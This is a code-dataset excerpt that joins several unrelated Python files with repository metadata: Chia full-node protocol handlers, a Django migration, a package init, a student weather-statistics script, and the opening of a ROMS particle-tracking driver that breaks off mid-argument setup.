candidate.foliage.foliage_block_data.get_hash(),
farmer_request.foliage_block_data_signature,
):
self.log.warning("Signature not valid. There might be a collision in plots. Ignore this during tests.")
return None
fsb2 = dataclasses.replace(
candidate.foliage,
foliage_block_data_signature=farmer_request.foliage_block_data_signature,
)
if candidate.is_transaction_block():
fsb2 = dataclasses.replace(
fsb2, foliage_transaction_block_signature=farmer_request.foliage_transaction_block_signature
)
new_candidate = dataclasses.replace(candidate, foliage=fsb2)
if not self.full_node.has_valid_pool_sig(new_candidate):
self.log.warning("Trying to make a pre-farm block but height is not 0")
return None
# Propagate to ourselves (which validates and does further propagations)
request = full_node_protocol.RespondUnfinishedBlock(new_candidate)
try:
await self.full_node.respond_unfinished_block(request, None, True)
except Exception as e:
# If we have an error with this block, try making an empty block
self.full_node.log.error(f"Error farming block {e} {request}")
candidate_tuple = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string, backup=True
)
if candidate_tuple is not None:
height, unfinished_block = candidate_tuple
self.full_node.full_node_store.add_candidate_block(
farmer_request.quality_string, height, unfinished_block, False
)
# All unfinished blocks that we create will have the foliage transaction block and hash
assert unfinished_block.foliage.foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
farmer_request.quality_string,
unfinished_block.foliage.foliage_block_data.get_hash(),
unfinished_block.foliage.foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
return None
# TIMELORD PROTOCOL
@peer_required
@api_request
async def new_infusion_point_vdf(
self, request: timelord_protocol.NewInfusionPointVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
# Lookup unfinished blocks
async with self.full_node.timelord_lock:
return await self.full_node.new_infusion_point_vdf(request, peer)
@peer_required
@api_request
async def new_signage_point_vdf(
self, request: timelord_protocol.NewSignagePointVDF, peer: ws.WSChiaConnection
) -> None:
if self.full_node.sync_store.get_sync_mode():
return None
full_node_message = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
request.challenge_chain_sp_vdf,
request.challenge_chain_sp_proof,
request.reward_chain_sp_vdf,
request.reward_chain_sp_proof,
)
await self.respond_signage_point(full_node_message, peer)
@peer_required
@api_request
async def new_end_of_sub_slot_vdf(
self, request: timelord_protocol.NewEndOfSubSlotVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_sub_slot(request.end_of_sub_slot_bundle.challenge_chain.get_hash())
is not None
):
return None
# Calls our own internal message to handle the end of sub slot, and potentially broadcasts to other peers.
full_node_message = full_node_protocol.RespondEndOfSubSlot(request.end_of_sub_slot_bundle)
msg, added = await self.full_node.respond_end_of_sub_slot(full_node_message, peer)
if not added:
self.log.error(
f"Was not able to add end of sub-slot: "
f"{request.end_of_sub_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge}. "
f"Re-sending new-peak to timelord"
)
await self.full_node.send_peak_to_timelords(peer=peer)
return None
else:
return msg
@api_request
async def request_block_header(self, request: wallet_protocol.RequestBlockHeader) -> Optional[Message]:
header_hash = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
msg = make_msg(ProtocolMessageTypes.reject_header_request, RejectHeaderRequest(request.height))
return msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
tx_removals, tx_additions, _ = await self.full_node.blockchain.get_tx_removals_and_additions(block)
header_block = get_block_header(block, tx_additions, tx_removals)
msg = make_msg(
ProtocolMessageTypes.respond_block_header,
wallet_protocol.RespondBlockHeader(header_block),
)
return msg
return None
@api_request
async def request_additions(self, request: wallet_protocol.RequestAdditions) -> Optional[Message]:
if request.header_hash is None:
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
else:
header_hash = request.header_hash
if header_hash is None:
raise ValueError(f"Block at height {request.height} not found")
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectAdditionsRequest(request.height, header_hash)
msg = make_msg(ProtocolMessageTypes.reject_additions_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
additions = await self.full_node.coin_store.get_coins_added_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
puzzlehash_coins_map: Dict[bytes32, List[Coin]] = {}
for coin_record in additions:
if coin_record.coin.puzzle_hash in puzzlehash_coins_map:
puzzlehash_coins_map[coin_record.coin.puzzle_hash].append(coin_record.coin)
else:
puzzlehash_coins_map[coin_record.coin.puzzle_hash] = [coin_record.coin]
coins_map: List[Tuple[bytes32, List[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes, Optional[bytes]]] = []
if request.puzzle_hashes is None:
for puzzle_hash, coins in puzzlehash_coins_map.items():
coins_map.append((puzzle_hash, coins))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, None)
else:
# Create addition Merkle set
addition_merkle_set = MerkleSet()
# Addition Merkle set contains puzzlehash and hash of all coins with that puzzlehash
for puzzle, coins in puzzlehash_coins_map.items():
addition_merkle_set.add_already_hashed(puzzle)
addition_merkle_set.add_already_hashed(hash_coin_list(coins))
assert addition_merkle_set.get_root() == block.foliage_transaction_block.additions_root
for puzzle_hash in request.puzzle_hashes:
result, proof = addition_merkle_set.is_included_already_hashed(puzzle_hash)
if puzzle_hash in puzzlehash_coins_map:
coins_map.append((puzzle_hash, puzzlehash_coins_map[puzzle_hash]))
hash_coin_str = hash_coin_list(puzzlehash_coins_map[puzzle_hash])
result_2, proof_2 = addition_merkle_set.is_included_already_hashed(hash_coin_str)
assert result
assert result_2
proofs_map.append((puzzle_hash, proof, proof_2))
else:
coins_map.append((puzzle_hash, []))
assert not result
proofs_map.append((puzzle_hash, proof, None))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_additions, response)
return msg
@api_request
async def request_removals(self, request: wallet_protocol.RequestRemovals) -> Optional[Message]:
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
peak_height = self.full_node.blockchain.get_peak_height()
if (
block is None
or block.is_transaction_block() is False
or block.height != request.height
or (peak_height is not None and block.height > peak_height)
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectRemovalsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_removals_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
all_removals: List[CoinRecord] = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
all_removals_dict: Dict[bytes32, Coin] = {}
for coin_record in all_removals:
all_removals_dict[coin_record.coin.name()] = coin_record.coin
coins_map: List[Tuple[bytes32, Optional[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes]] = []
# If there are no transactions, respond with empty lists
if block.transactions_generator is None:
proofs: Optional[List]
if request.coin_names is None:
proofs = None
else:
proofs = []
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, [], proofs)
elif request.coin_names is None or len(request.coin_names) == 0:
for removed_name, removed_coin in all_removals_dict.items():
coins_map.append((removed_name, removed_coin))
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, None)
else:
assert block.transactions_generator
removal_merkle_set = MerkleSet()
for removed_name, removed_coin in all_removals_dict.items():
removal_merkle_set.add_already_hashed(removed_name)
assert removal_merkle_set.get_root() == block.foliage_transaction_block.removals_root
for coin_name in request.coin_names:
result, proof = removal_merkle_set.is_included_already_hashed(coin_name)
proofs_map.append((coin_name, proof))
if coin_name in all_removals_dict:
removed_coin = all_removals_dict[coin_name]
coins_map.append((coin_name, removed_coin))
assert result
else:
coins_map.append((coin_name, None))
assert not result
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_removals, response)
return msg
@api_request
async def send_transaction(self, request: wallet_protocol.SendTransaction, *, test=False) -> Optional[Message]:
spend_name = request.transaction.name()
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(request.transaction, None, spend_name, None, test))
)
# Waits for the transaction to go into the mempool, times out after 45 seconds.
status, error = None, None
sleep_time = 0.01
for i in range(int(45 / sleep_time)):
await asyncio.sleep(sleep_time)
for potential_name, potential_status, potential_error in self.full_node.transaction_responses:
if spend_name == potential_name:
status = potential_status
error = potential_error
break
if status is not None:
break
if status is None:
response = wallet_protocol.TransactionAck(spend_name, uint8(MempoolInclusionStatus.PENDING), None)
else:
error_name = error.name if error is not None else None
if status == MempoolInclusionStatus.SUCCESS:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
else:
# If if failed/pending, but it previously succeeded (in mempool), this is idempotence, return SUCCESS
if self.full_node.mempool_manager.get_spendbundle(spend_name) is not None:
response = wallet_protocol.TransactionAck(
spend_name, uint8(MempoolInclusionStatus.SUCCESS.value), None
)
else:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
msg = make_msg(ProtocolMessageTypes.transaction_ack, response)
return msg
@api_request
async def request_puzzle_solution(self, request: wallet_protocol.RequestPuzzleSolution) -> Optional[Message]:
coin_name = request.coin_name
height = request.height
coin_record = await self.full_node.coin_store.get_coin_record(coin_name)
reject = wallet_protocol.RejectPuzzleSolution(coin_name, height)
reject_msg = make_msg(ProtocolMessageTypes.reject_puzzle_solution, reject)
if coin_record is None or coin_record.spent_block_index != height:
return reject_msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(height)
if header_hash is None:
return reject_msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is None or block.transactions_generator is None:
return reject_msg
block_generator: Optional[BlockGenerator] = await self.full_node.blockchain.get_block_generator(block)
assert block_generator is not None
error, puzzle, solution = get_puzzle_and_solution_for_coin(
block_generator, coin_name, self.full_node.constants.MAX_BLOCK_COST_CLVM
)
if error is not None:
return reject_msg
pz = Program.to(puzzle)
sol = Program.to(solution)
wrapper = PuzzleSolutionResponse(coin_name, height, pz, sol)
response = wallet_protocol.RespondPuzzleSolution(wrapper)
response_msg = make_msg(ProtocolMessageTypes.respond_puzzle_solution, response)
return response_msg
@api_request
async def request_header_blocks(self, request: wallet_protocol.RequestHeaderBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
return None
header_hashes: List[bytes32] = []
for i in range(request.start_height, request.end_height + 1):
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash is None:
reject = RejectHeaderBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_header_blocks, reject)
return msg
header_hashes.append(header_hash)
blocks: List[FullBlock] = await self.full_node.block_store.get_blocks_by_hash(header_hashes)
header_blocks = []
for block in blocks:
added_coins_records = await self.full_node.coin_store.get_coins_added_at_height(block.height)
removed_coins_records = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
added_coins = [record.coin for record in added_coins_records if not record.coinbase]
removal_names = [record.coin.name() for record in removed_coins_records]
header_block = get_block_header(block, added_coins, removal_names)
header_blocks.append(header_block)
msg = make_msg(
ProtocolMessageTypes.respond_header_blocks,
wallet_protocol.RespondHeaderBlocks(request.start_height, request.end_height, header_blocks),
)
return msg
@api_request
async def respond_compact_proof_of_time(self, request: timelord_protocol.RespondCompactProofOfTime):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_proof_of_time(request)
@execute_task
@peer_required
@api_request
@bytes_required
async def new_compact_vdf(
self, request: full_node_protocol.NewCompactVDF, peer: ws.WSChiaConnection, request_bytes: bytes = b""
):
if self.full_node.sync_store.get_sync_mode():
return None
if len(self.full_node.compact_vdf_sem._waiters) > 20:
self.log.debug(f"Ignoring NewCompactVDF: {request}, _waiters")
return
name = std_hash(request_bytes)
if name in self.full_node.compact_vdf_requests:
self.log.debug(f"Ignoring NewCompactVDF: {request}, already requested")
return
self.full_node.compact_vdf_requests.add(name)
# this semaphore will only allow a limited number of tasks call
# new_compact_vdf() at a time, since it can be expensive
async with self.full_node.compact_vdf_sem:
try:
await self.full_node.new_compact_vdf(request, peer)
finally:
self.full_node.compact_vdf_requests.remove(name)
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_compact_vdf])
async def request_compact_vdf(self, request: full_node_protocol.RequestCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.request_compact_vdf(request, peer)
@peer_required
@api_request
async def respond_compact_vdf(self, request: full_node_protocol.RespondCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_vdf(request, peer)
@peer_required
@api_request
async def register_interest_in_puzzle_hash(
self, request: wallet_protocol.RegisterForPhUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_puzzle_hash:
self.full_node.peer_puzzle_hash[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
hint_coin_ids = []
# Add peer to the "Subscribed" dictionary
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for puzzle_hash in request.puzzle_hashes:
ph_hint_coins = await self.full_node.hint_store.get_coin_ids(puzzle_hash)
hint_coin_ids.extend(ph_hint_coins)
if puzzle_hash not in self.full_node.ph_subscriptions:
self.full_node.ph_subscriptions[puzzle_hash] = set()
if (
peer.peer_node_id not in self.full_node.ph_subscriptions[puzzle_hash]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.ph_subscriptions[puzzle_hash].add(peer.peer_node_id)
self.full_node.peer_puzzle_hash[peer.peer_node_id].add(puzzle_hash)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
# Send all coins with requested puzzle hash that have been created after the specified height
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_puzzle_hashes(
include_spent_coins=True, puzzle_hashes=request.puzzle_hashes, min_height=request.min_height
)
if len(hint_coin_ids) > 0:
hint_states = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=hint_coin_ids, min_height=request.min_height
)
states.extend(hint_states)
response = wallet_protocol.RespondToPhUpdates(request.puzzle_hashes, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_ph_update, response)
return msg
@peer_required
@api_request
async def register_interest_in_coin(
self, request: wallet_protocol.RegisterForCoinUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_coin_ids:
self.full_node.peer_coin_ids[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for coin_id in request.coin_ids:
if coin_id not in self.full_node.coin_subscriptions:
self.full_node.coin_subscriptions[coin_id] = set()
if (
peer.peer_node_id not in self.full_node.coin_subscriptions[coin_id]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.coin_subscriptions[coin_id].add(peer.peer_node_id)
self.full_node.peer_coin_ids[peer.peer_node_id].add(coin_id)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=request.coin_ids, min_height=request.min_height
)
response = wallet_protocol.RespondToCoinUpdates(request.coin_ids, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_coin_update, response)
return msg
@api_request
async def request_children(self, request: wallet_protocol.RequestChildren) -> Optional[Message]:
coin_records: List[CoinRecord] = await self.full_node.coin_store.get_coin_records_by_parent_ids(
True, [request.coin_name]
)
states = [record.coin_state for record in coin_records]
response = wallet_protocol.RespondChildren(states)
msg = make_msg(ProtocolMessageTypes.respond_children, response)
return msg
@api_request
async def request_ses_hashes(self, request: wallet_protocol.RequestSESInfo):
ses_height = self.full_node.blockchain.get_ses_heights()
start_height = request.start_height
end_height = request.end_height
ses_hash_heights = []
ses_reward_hashes = []
for idx, ses_start_height in enumerate(ses_height):
if idx == len(ses_height) - 1:
break
next_ses_height = ses_height[idx + 1]
# start_ses_hash
if ses_start_height <= start_height < next_ses_height:
ses_hash_heights.append([ses_start_height, next_ses_height])
ses: SubEpochSummary = self.full_node.blockchain.get_ses(ses_start_height)
ses_reward_hashes.append(ses.reward_chain_hash)
if ses_start_height < end_height < next_ses_height:
break
else:
if idx == len(ses_height) - 2:
break
# else add extra ses as request start <-> end spans two ses
next_next_height = ses_height[idx + 2]
ses_hash_heights.append([next_ses_height, next_next_height])
nex_ses: SubEpochSummary = self.full_node.blockchain.get_ses(next_ses_height)
ses_reward_hashes.append(nex_ses.reward_chain_hash)
break
response = RespondSESInfo(ses_reward_hashes, ses_hash_heights)
msg = make_msg(ProtocolMessageTypes.respond_ses_hashes, response)
return msg
| true
| true
|
790da6c31447b466d9cc6aace31cb537caffffd7
| 2,357
|
py
|
Python
|
apps/amcm/migrations/0032_auto_20220104_0437.py
|
agsneutron/asociacion_mexicana_cuarto_milla
|
4657e1f494eb572e9b40b2804e012cdfd6193c51
|
[
"MIT"
] | null | null | null |
apps/amcm/migrations/0032_auto_20220104_0437.py
|
agsneutron/asociacion_mexicana_cuarto_milla
|
4657e1f494eb572e9b40b2804e012cdfd6193c51
|
[
"MIT"
] | null | null | null |
apps/amcm/migrations/0032_auto_20220104_0437.py
|
agsneutron/asociacion_mexicana_cuarto_milla
|
4657e1f494eb572e9b40b2804e012cdfd6193c51
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.8 on 2022-01-04 10:37
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('amcm', '0031_auto_20220104_0431'),
]
operations = [
migrations.AddField(
model_name='eventoelegibles',
name='evento',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='amcm.evento'),
preserve_default=False,
),
migrations.AlterField(
model_name='credito',
name='fecha_pago',
field=models.DateField(blank=True, default=datetime.datetime(2022, 1, 4, 10, 37, 3, 977886, tzinfo=utc), null=True, verbose_name='Fecha de pago'),
),
migrations.AlterField(
model_name='credito',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 977861, tzinfo=utc), verbose_name='Fecha de registro'),
),
migrations.AlterField(
model_name='cuentaspago',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 961284, tzinfo=utc), verbose_name='Fecha de Registro'),
),
migrations.AlterField(
model_name='elegible',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 962608, tzinfo=utc), verbose_name='Fecha de registro'),
),
migrations.AlterField(
model_name='pago',
name='fechaPago',
field=models.DateField(blank=True, default=datetime.datetime(2022, 1, 4, 10, 37, 3, 959833, tzinfo=utc), null=True, verbose_name='Fecha del Pago'),
),
migrations.AlterField(
model_name='pago',
name='fechaRegistro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 959863, tzinfo=utc), verbose_name='Fecha de Registro'),
),
migrations.AlterField(
model_name='recibo',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 976856, tzinfo=utc), verbose_name='Fecha de registro'),
),
]
| 40.637931
| 159
| 0.614765
|
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('amcm', '0031_auto_20220104_0431'),
]
operations = [
migrations.AddField(
model_name='eventoelegibles',
name='evento',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='amcm.evento'),
preserve_default=False,
),
migrations.AlterField(
model_name='credito',
name='fecha_pago',
field=models.DateField(blank=True, default=datetime.datetime(2022, 1, 4, 10, 37, 3, 977886, tzinfo=utc), null=True, verbose_name='Fecha de pago'),
),
migrations.AlterField(
model_name='credito',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 977861, tzinfo=utc), verbose_name='Fecha de registro'),
),
migrations.AlterField(
model_name='cuentaspago',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 961284, tzinfo=utc), verbose_name='Fecha de Registro'),
),
migrations.AlterField(
model_name='elegible',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 962608, tzinfo=utc), verbose_name='Fecha de registro'),
),
migrations.AlterField(
model_name='pago',
name='fechaPago',
field=models.DateField(blank=True, default=datetime.datetime(2022, 1, 4, 10, 37, 3, 959833, tzinfo=utc), null=True, verbose_name='Fecha del Pago'),
),
migrations.AlterField(
model_name='pago',
name='fechaRegistro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 959863, tzinfo=utc), verbose_name='Fecha de Registro'),
),
migrations.AlterField(
model_name='recibo',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 976856, tzinfo=utc), verbose_name='Fecha de registro'),
),
]
| true
| true
|
790da6f58ba37152bebfc637af2c6cf00f701207
| 1,715
|
py
|
Python
|
gautools/__init__.py
|
thompcinnamon/QM-calc-scripts
|
60b06e14b2efd307d419201079bb24152ab0bd3c
|
[
"Apache-2.0"
] | null | null | null |
gautools/__init__.py
|
thompcinnamon/QM-calc-scripts
|
60b06e14b2efd307d419201079bb24152ab0bd3c
|
[
"Apache-2.0"
] | 2
|
2018-07-18T19:53:08.000Z
|
2019-02-25T23:25:51.000Z
|
gautools/__init__.py
|
theavey/QM-calc-scripts
|
60b06e14b2efd307d419201079bb24152ab0bd3c
|
[
"Apache-2.0"
] | 1
|
2017-01-04T20:50:21.000Z
|
2017-01-04T20:50:21.000Z
|
"""This is a set of tools built up over time for working with Gaussian and
QChem input and output."""
########################################################################
# #
# #
# This script was written by Thomas Heavey in 2017. #
# theavey@bu.edu thomasjheavey@gmail.com #
# #
# Copyright 2017 Thomas J. Heavey IV #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #
# implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
########################################################################
pass
| 61.25
| 74
| 0.348105
| true
| true
|
|
790da99041289e9e42219eef39722619d6f10b57
| 3,222
|
py
|
Python
|
stanCode_Projects/weather_master/weather_master.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
stanCode_Projects/weather_master/weather_master.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
stanCode_Projects/weather_master/weather_master.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
"""
File: weather_master.py
Name: Claire Lin
-----------------------
This program should implement a console program
that asks weather data from user to compute the
average, highest, lowest, cold days among the inputs.
Output format should match what is shown in the sample
run in the Assignment 2 Handout.
"""
EXIT = -100
def main():
"""
To find the highest and lowest temperature, cold days and the average.
"""
print('stanCode \"Weather Master 4.0\"!')
# my friend told me the maximum and minimum variable can set like this.
maximum = -100000000
minimum = 100000000
total = 0
count = 0
cold_day = 0
while True:
temperature = int(input('Next Temperature: (or '+str(EXIT) + ' to quit)? '))
# To jump out from the program when no temperature were entered.
if temperature == EXIT and count == 0:
print('No temperatures were entered.')
break
# To exclude the temperature not exist.
if temperature > 90 or temperature < -100:
print('>>> The temperature \"'+str(temperature)+'\" not exist, so we exclude and stop it.')
break
if temperature == EXIT:
break
else:
count += 1 # count the total days.
if temperature < 16:
cold_day += 1 # count the cold days which temperature below 16.
total += temperature # To plus all temperature.
if temperature > maximum:
maximum = temperature
if temperature < minimum:
minimum = temperature
else:
pass
if count != 0:
avg = total / count
print("")
print('Highest temperature = ' + str(maximum))
print('Lowest temperature = ' + str(minimum))
print('Average = '+str(avg))
print(str(cold_day) + ' cold day(s)')
# For checking
# print(total)
# print(count)
"""
My note:
This is the first try, when I debug I found the calculation logic is wrong.
The first variable I type will disappear when it enter into the while loop. And the count of
total days would include the EXIT constant.
"""
# if temperature == EXIT:
# print('No temperatures were entered.')
#
# else:
# while True:
# # if temperature < 16:
# # cold_day += 1
#
# temperature = int(input('Next Temperature: (or '+str(EXIT) + ' to quit)? '))
#
# # count the total days.
# count += 1
#
# if temperature == EXIT:
# break
#
# total += temperature
# if temperature > maximum:
# maximum = temperature
# elif temperature < minimum:
# minimum = temperature
# else:
# pass
#
# avg = total / count
# print('Highest temperature = ' + str(maximum))
# print('Lowest temperature = ' + str(minimum))
# print('Average = '+str(avg))
# print(str(cold_day) + ' cold day(s)')
###### DO NOT EDIT CODE BELOW THIS LINE ######
if __name__ == "__main__":
main()
| 28.513274
| 103
| 0.543451
|
EXIT = -100
def main():
print('stanCode \"Weather Master 4.0\"!')
maximum = -100000000
minimum = 100000000
total = 0
count = 0
cold_day = 0
while True:
temperature = int(input('Next Temperature: (or '+str(EXIT) + ' to quit)? '))
if temperature == EXIT and count == 0:
print('No temperatures were entered.')
break
if temperature > 90 or temperature < -100:
print('>>> The temperature \"'+str(temperature)+'\" not exist, so we exclude and stop it.')
break
if temperature == EXIT:
break
else:
count += 1
if temperature < 16:
cold_day += 1
total += temperature
if temperature > maximum:
maximum = temperature
if temperature < minimum:
minimum = temperature
else:
pass
if count != 0:
avg = total / count
print("")
print('Highest temperature = ' + str(maximum))
print('Lowest temperature = ' + str(minimum))
print('Average = '+str(avg))
print(str(cold_day) + ' cold day(s)')
| true
| true
|
790da9f977709c1b0764594562bf1b2cb0f52777
| 9,682
|
py
|
Python
|
tracker/tracker/user_tracker.py
|
PuffyPuffin/LO_user
|
c7cafc2045b027aad0098d034cbe2b70126c8379
|
[
"MIT"
] | null | null | null |
tracker/tracker/user_tracker.py
|
PuffyPuffin/LO_user
|
c7cafc2045b027aad0098d034cbe2b70126c8379
|
[
"MIT"
] | null | null | null |
tracker/tracker/user_tracker.py
|
PuffyPuffin/LO_user
|
c7cafc2045b027aad0098d034cbe2b70126c8379
|
[
"MIT"
] | null | null | null |
"""
Code for particle tracking, designed for ROMS output. This new version
makes extensive use of nearest-neighbor KDTree algorithms for interpolation.
This results is significantly (36x) faster runtimes compared with old version.
PERFORMANCE: about 3 minutes per day for a 3D cas6 experiment with 10k particles.
NOTE: You have to have run make_KDTrees.py for the grid (e.g. cas6) before running.
NOTE: There is some issue, perhaps with garbage collection, which causes
the loading of NetCDF files to happen slower after running a few times
interactively from ipython. It appears that this can be avoided by running
from the terminal as: python tracker.py [args].
This program is a driver where you specify:
- an experiment (ROMS run + release locations + other choices)
- a release or set of releases within that experiment (start day, etc.)
The main argument you provide is -exp, which is the experiment name, and
is used by experiments.get_exp_info() and .get_ic() to get the gtagex and initial particle
locations. Other possible commmand line arguments and their defaults
are explained in the argparse section below.
NOTE: To improve usefulness for people other than me, this driver will
first look for:
- LiveOcean_user/tracker/user_trackfun.py
before loading my versions.
This allows you to create your own modifications to the tracking
(e.g. for diurnal depth behavior) while still being able to use git pull to update the main code.
It can be run on its own, or with command line arguments to facilitate
large, automated jobs, for example in python:
Examples:
python tracker.py -clb True
the same command, with all the argmuents typed, instead of getting the as defaults:
python tracker.py -gtx cas6_v3_lo8b -ro 2 -d 2019.07.04 -exp jdf0 -clb True
"""
import sys
from datetime import datetime, timedelta
from time import time
import argparse
import numpy as np
from lo_tools import Lfun, zfun
Ldir = Lfun.Lstart()
from importlib import reload
pth = Ldir['LOu'] / 'tracker'
if str(pth) not in sys.path:
sys.path.append(str(pth))
import experiments as exp
reload(exp)
import trackfun_nc as tfnc
reload(tfnc)
# The import of trackfun or user_trackfun is done later in this program,
# about 100 lines down.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# command line arguments, can be input in any order
parser = argparse.ArgumentParser()
# Set the experiment name
# (details set in experiments.py, or, if it exists, user_experiments.py)
parser.add_argument('-gtx', '--gtagex', default='cas6_v0_live', type=str)
parser.add_argument('-ro', '--roms_out_num', default=2, type=int)
# 1 = Ldir['roms_out1'], etc.
# this is the first starting day
parser.add_argument('-d', '--date_string', default='2021.10.15', type=str)
parser.add_argument('-exp', '--exp_name', default='elb', type=str)
parser.add_argument('-clb', '--clobber', default=False, type=zfun.boolean_string)
# overwrite existing output folder if clobber == True
parser.add_argument('-sub_tag', default='', type=str)
# append an optional tag to the end of the output folder name
# These are False unless the flags are used with the argument True
# so if you do NOT use these flags the run will be:
# - trapped to the surface
# - no vertical turbulent diffusion
parser.add_argument('-3d', default=False, type=zfun.boolean_string) # do 3d tracking
parser.add_argument('-laminar', default=False, type=zfun.boolean_string) # no turbulence
parser.add_argument('-no_advection', default=False, type=zfun.boolean_string) # no advection
parser.add_argument('-sink', default=0, type=float) # particle sinking speed (m per day, e.g. 40)
# windage = a small number: 0 <= windage << 1 (e.g. 0.03)
# fraction of windspeed added to advection, only for 3d=False
parser.add_argument('-wnd', '--windage', default=0, type=float)
# You can make multiple releases using:
